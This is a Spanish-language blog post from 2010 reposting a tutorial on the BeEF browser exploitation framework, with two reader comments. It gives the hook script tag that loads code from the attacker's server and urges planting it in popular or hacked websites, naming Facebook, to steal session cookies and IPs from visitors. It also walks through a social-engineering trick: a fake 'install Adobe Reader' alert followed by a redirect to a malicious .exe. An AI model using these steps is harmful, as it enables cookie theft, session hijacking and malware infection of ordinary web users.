6 may. 2010

[BeEF] Tutorial

Bueno, hace algún tiempo publique información sobre BeEF: [BeEFYPROXY] Interceptar el trafico WEB (MITM) ahora les traigo un tutorial que encontré y que es bastante bueno, lo recomiendo 100%:


INICIEMOS

1- Descargamos BeEF de Su pagina oficial
http://www.bindshell.net/tools/beef/

2- Desempaquetamos.....

3-En un Hosting montamos los Archivos...Cuando acabemos vamos a la GUI:

¿Una Vez Montado como saber si funciona?


Simple Nos Ponemos en la GUI :D

Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCIÓN

Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos que Al cabo de unos Segundos Conecta...

Quiere decir que Nuestro BeEF esta Listo :D!!!


¿COMO USARLO?

Bueno vamos al menú que Nombre anteriormente VIEW/Spawn Zombie Example

Nos saldrá esta pag:

Dicho código es un ARCHIVO SCRIPT que se encuentra en los archivos que nosotros subimos con el BEEF!

<script language='Javascript' src="http://          /beef/hook/beefmagic.js.php'></script>

Ese Code Hay que Meterlo en el Body de las Páginas.. Su función sería crear un Puente...Se preguntan en que Páginas¿?... en las que Quieran...!!! EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios EJEMPLO: facebook.com XD podrías robar SESIONES COOKIES.. Ademas Podrías meterlo en varias webs FAMOSAS CON MUCHA VISITAS y a los users los Rediriges a un EXE y así Podrías tener un Malware Infeccion

Mentiendo el Code en un INDEX de un Hacked HOST!

Este Code hará una simulación de quw la web esta Cargando... y A la vez Conecta al BEEF CLIENT.







En Nuestro Client BEEF Veríamos esto....

1 ZOMBIE A CONECTADO :D
  • Podriamos Robar Cookies
  • Sacar IPS
  • Enviar Alerts!
  • Java Applet!
  • Entre otras Funciones.....
Enviando Alerts

1- VISTA DESDE EL CLIENT MANAGER

2-VISTA DESDE LA WEB Q RECIBE

Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!


1- Enviamos AlerT al usuario con algo q haga descarga

EJEMPLO: "Para Ver la Página Necesita tener Adobe reader 3"

El usuario dira Bueno lo Descargo de una....


2- Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3

a- Vamos a NETWORK MODULES/ BROWSER REDIRECT

b- Ingresamos el enlace con el .exe MALICIOSO

c- Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF

Fuente: http://maztor.diosdelared.com/

[+] Salu2

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

2 Notaciones:

  1. Wauuu Siempre este Tio aportando Cosas Impactantes y muy buenas... Excelente tuto !

    ResponderEliminar
  2. sera que eso serviria de XSSshell¿?

    ResponderEliminar

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.